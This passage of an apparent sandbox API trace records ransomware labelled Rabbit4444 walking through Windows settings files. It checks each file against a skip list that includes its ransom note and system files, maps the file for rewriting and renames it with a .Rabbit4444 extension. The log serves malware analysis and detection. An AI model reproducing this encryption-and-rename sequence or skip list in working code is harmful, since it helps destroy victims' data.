lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Language_Add_Profile.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_language_add_profile.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.460] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e4e2da6, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2e4e2da6, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a0254b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x533, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Language_Installed_Profiles_Collection.settingcontent-ms", cAlternateFileName="AA8460~1.SET")) returned 1 [0057.460] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Installed_Profiles_Collection.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.460] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Installed_Profiles_Collection.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.460] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Installed_Profiles_Collection.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.461] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Installed_Profiles_Collection.settingcontent-ms", lpString2=".") returned 1 [0057.461] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Installed_Profiles_Collection.settingcontent-ms", lpString2="..") returned 1 [0057.461] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Installed_Profiles_Collection.settingcontent-ms", lpString2="windows") returned -1 [0057.461] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Installed_Profiles_Collection.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.461] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Installed_Profiles_Collection.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.461] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Installed_Profiles_Collection.settingcontent-ms", lpString2="boot") returned -1 [0057.461] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Installed_Profiles_Collection.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.461] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Installed_Profiles_Collection.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.461] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Language_Installed_Profiles_Collection.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Language_Installed_Profiles_Collection.settingcontent-ms") returned="AAA_SystemSettings_Language_Installed_Profiles_Collection.settingcontent-ms" [0057.461] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Language_Installed_Profiles_Collection.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.461] lstrlenW (lpString="AAA_SystemSettings_Language_Installed_Profiles_Collection.settingcontent-ms") returned 75 [0057.461] lstrlenW (lpString="Rabbit4444") returned 10 [0057.461] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.461] lstrlenW (lpString=".dll") returned 4 [0057.461] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.461] lstrlenW (lpString=".lnk") returned 4 [0057.461] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.461] lstrlenW (lpString=".ini") returned 4 [0057.461] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.461] lstrlenW (lpString=".sys") returned 4 [0057.461] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.461] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Language_Installed_Profiles_Collection.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_language_installed_profiles_collection.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.462] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.462] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14877236470) returned 1 [0057.462] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1331) returned 1 [0057.462] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0057.462] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0057.462] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x840, lpName=0x0) returned 0x298 [0057.463] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x840) returned 0x70000 [0057.464] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.464] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0057.464] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.464] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0057.464] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.464] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0057.464] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.464] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0057.464] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14877479469) returned 1 [0057.464] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0057.464] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0057.464] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.464] CloseHandle (hObject=0x298) returned 1 [0057.464] CloseHandle (hObject=0x278) returned 1 [0057.464] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Language_Installed_Profiles_Collection.settingcontent-ms.Rabbit4444") returned 203 [0057.464] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Language_Installed_Profiles_Collection.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_language_installed_profiles_collection.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Language_Installed_Profiles_Collection.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_language_installed_profiles_collection.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.465] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e614103, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2e614103, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x238d127e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Language_Personal_Data_Control.settingcontent-ms", cAlternateFileName="AA83B4~1.SET")) returned 1 [0057.465] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Personal_Data_Control.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.465] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Personal_Data_Control.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.465] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Personal_Data_Control.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.465] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Personal_Data_Control.settingcontent-ms", lpString2=".") returned 1 [0057.466] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Personal_Data_Control.settingcontent-ms", lpString2="..") returned 1 [0057.466] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Personal_Data_Control.settingcontent-ms", lpString2="windows") returned -1 [0057.466] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Personal_Data_Control.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.466] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Personal_Data_Control.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.466] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Personal_Data_Control.settingcontent-ms", lpString2="boot") returned -1 [0057.466] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Personal_Data_Control.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.466] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Personal_Data_Control.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.466] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Language_Personal_Data_Control.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Language_Personal_Data_Control.settingcontent-ms") returned="AAA_SystemSettings_Language_Personal_Data_Control.settingcontent-ms" [0057.466] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Language_Personal_Data_Control.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.466] lstrlenW (lpString="AAA_SystemSettings_Language_Personal_Data_Control.settingcontent-ms") returned 67 [0057.466] lstrlenW (lpString="Rabbit4444") returned 10 [0057.466] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.466] lstrlenW (lpString=".dll") returned 4 [0057.466] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.466] lstrlenW (lpString=".lnk") returned 4 [0057.466] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.466] lstrlenW (lpString=".ini") returned 4 [0057.466] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.466] lstrlenW (lpString=".sys") returned 4 [0057.466] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.466] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Language_Personal_Data_Control.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_language_personal_data_control.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.467] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.467] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14877737573) returned 1 [0057.467] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1276) returned 1 [0057.467] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0057.467] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0057.467] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x298 [0057.468] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x70000 [0057.469] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.469] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0057.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.469] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0057.469] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0057.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0057.469] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14878023935) returned 1 [0057.470] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0057.470] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0057.470] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.470] CloseHandle (hObject=0x298) returned 1 [0057.470] CloseHandle (hObject=0x278) returned 1 [0057.470] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Language_Personal_Data_Control.settingcontent-ms.Rabbit4444") returned 195 [0057.470] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Language_Personal_Data_Control.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_language_personal_data_control.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Language_Personal_Data_Control.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_language_personal_data_control.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.471] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e791815, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2e791815, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x239dc2f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4f2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Language_Web_Content_Control.settingcontent-ms", cAlternateFileName="AA7819~1.SET")) returned 1 [0057.471] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Web_Content_Control.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.471] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Web_Content_Control.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.471] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Web_Content_Control.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.471] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Web_Content_Control.settingcontent-ms", lpString2=".") returned 1 [0057.471] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Web_Content_Control.settingcontent-ms", lpString2="..") returned 1 [0057.471] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Web_Content_Control.settingcontent-ms", lpString2="windows") returned -1 [0057.471] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Web_Content_Control.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.471] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Web_Content_Control.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.471] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Web_Content_Control.settingcontent-ms", lpString2="boot") returned -1 [0057.471] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Web_Content_Control.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.471] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Web_Content_Control.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.471] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Language_Web_Content_Control.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Language_Web_Content_Control.settingcontent-ms") returned="AAA_SystemSettings_Language_Web_Content_Control.settingcontent-ms" [0057.471] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Language_Web_Content_Control.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.471] lstrlenW (lpString="AAA_SystemSettings_Language_Web_Content_Control.settingcontent-ms") returned 65 [0057.471] lstrlenW (lpString="Rabbit4444") returned 10 [0057.471] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.471] lstrlenW (lpString=".dll") returned 4 [0057.471] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.471] lstrlenW (lpString=".lnk") returned 4 [0057.471] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.471] lstrlenW (lpString=".ini") returned 4 [0057.471] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.472] lstrlenW (lpString=".sys") returned 4 [0057.472] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.472] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Language_Web_Content_Control.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_language_web_content_control.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.472] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.472] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14878260685) returned 1 [0057.472] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1266) returned 1 [0057.472] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0057.472] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0057.472] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x298 [0057.473] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x70000 [0057.474] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.474] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0057.474] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.474] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0057.474] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.474] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0057.474] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.474] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0057.474] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14878506604) returned 1 [0057.474] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0057.474] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0057.474] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.475] CloseHandle (hObject=0x298) returned 1 [0057.475] CloseHandle (hObject=0x278) returned 1 [0057.475] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Language_Web_Content_Control.settingcontent-ms.Rabbit4444") returned 193 [0057.475] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Language_Web_Content_Control.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_language_web_content_control.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Language_Web_Content_Control.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_language_web_content_control.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.475] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea664d3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2ea664d3, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x234329b1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4a8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Maps_DeleteAll.settingcontent-ms", cAlternateFileName="AA2E08~1.SET")) returned 1 [0057.476] lstrcmpiW (lpString1="AAA_SystemSettings_Maps_DeleteAll.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.476] lstrcmpiW (lpString1="AAA_SystemSettings_Maps_DeleteAll.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.476] lstrcmpiW (lpString1="AAA_SystemSettings_Maps_DeleteAll.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.476] lstrcmpiW (lpString1="AAA_SystemSettings_Maps_DeleteAll.settingcontent-ms", lpString2=".") returned 1 [0057.476] lstrcmpiW (lpString1="AAA_SystemSettings_Maps_DeleteAll.settingcontent-ms", lpString2="..") returned 1 [0057.476] lstrcmpiW (lpString1="AAA_SystemSettings_Maps_DeleteAll.settingcontent-ms", lpString2="windows") returned -1 [0057.476] lstrcmpiW (lpString1="AAA_SystemSettings_Maps_DeleteAll.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.476] lstrcmpiW (lpString1="AAA_SystemSettings_Maps_DeleteAll.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.476] lstrcmpiW (lpString1="AAA_SystemSettings_Maps_DeleteAll.settingcontent-ms", lpString2="boot") returned -1 [0057.476] lstrcmpiW (lpString1="AAA_SystemSettings_Maps_DeleteAll.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.476] lstrcmpiW (lpString1="AAA_SystemSettings_Maps_DeleteAll.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.476] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Maps_DeleteAll.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Maps_DeleteAll.settingcontent-ms") returned="AAA_SystemSettings_Maps_DeleteAll.settingcontent-ms" [0057.476] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Maps_DeleteAll.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.476] lstrlenW (lpString="AAA_SystemSettings_Maps_DeleteAll.settingcontent-ms") returned 51 [0057.476] lstrlenW (lpString="Rabbit4444") returned 10 [0057.476] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.476] lstrlenW (lpString=".dll") returned 4 [0057.476] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.476] lstrlenW (lpString=".lnk") returned 4 [0057.476] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.476] lstrlenW (lpString=".ini") returned 4 [0057.476] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.476] lstrlenW (lpString=".sys") returned 4 [0057.476] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.477] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Maps_DeleteAll.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_maps_deleteall.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.477] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.477] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14878755506) returned 1 [0057.477] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1192) returned 1 [0057.477] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0057.477] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0057.477] CreateFileMappingW 